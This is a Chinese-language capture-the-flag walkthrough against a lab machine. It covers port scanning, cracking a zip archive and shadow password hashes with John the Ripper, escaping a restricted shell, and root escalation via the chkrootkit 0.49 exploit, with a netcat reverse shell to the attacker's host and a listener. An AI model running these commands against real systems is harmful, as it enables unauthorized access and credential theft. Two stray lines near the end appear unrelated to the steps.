一、信息收集
1、查看靶机的mac地址:
2、查看靶机的ip地址:
nmap 192.168.7.0/24
3、扫描靶机开放的端口:
nmap -p- 192.168.7.202
4、查看靶机的80端口,只看到有一个zip文件:
5、进行目录扫描,没有有用的信息:
dirsearch -u "http://192.168.7.202"
6、下载zip文件,发现解压需要密码:
7、看到压缩包里面有shadow文件,如果能爆破出SSH密码,就能登录SSH服务:
使用命令zip2john save.zip > save.zip.hash
john save.zip.hash爆破压缩包的解压密码
获得save.zip的解压密码:manuel
8、解压并查看shadow文件的内容,发现root用户和296640a3b825115a47b68fc44501c828用户允许登录:
9、使用命令sudo john ./etc/shadow --format=crypt爆破./etc/shadow文件中的SSH密码:
获得用户296640a3b825115a47b68fc44501c828的SSH密码server
10、使用账号密码进行ssh连接,连接成功但是用户权限很低:
二、提权
1、使用sudo -l、find / -perm -u=s -ls 2>/dev/null查看,发现没有办法使用sudo和suid提权:
2、使用ls -al命令发现很多文件读不了,可以读取的文件,发现没有cat命令:
3、发现ssh命令参数-t "bash --noprofile"可以强制分配伪终端,从而解决命令受限问题:
ssh 296640a3b825115a47b68fc44501c828@172.16.7.202 -t "bash --noprofile"
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$PATH
4、使用sudo -l查看,依旧没有sudo权限:
5、使用命令查看是否可以使用suid提权的文件,发现没有文件可以提权:
find / -perm -u=s -ls 2>/dev/null
6、使用ls -al查看文件,曾经执行过解压chkrootkit-0.49.tar.gz文件的命令,也就是系统可能使用0.49版本的chkrootkit程序:
7、0.49版本的chkrootkit程序存在本地提权漏洞,使用命令查询漏洞情况:
searchsploit chkrootkit
8、将前面发现的EXP复制到当前目录:
searchsploit -m 33899
9、使用语句进行反弹shell:
echo nc -nv 192.168.7.200 4444 -e /bin/bash > /tmp/update
chmod +x /tmp/update
/usr/bin/touch /dev/shm/STTY5246
honeypot.decoy
5
10、kali开启监听:
nc -lvvp 4444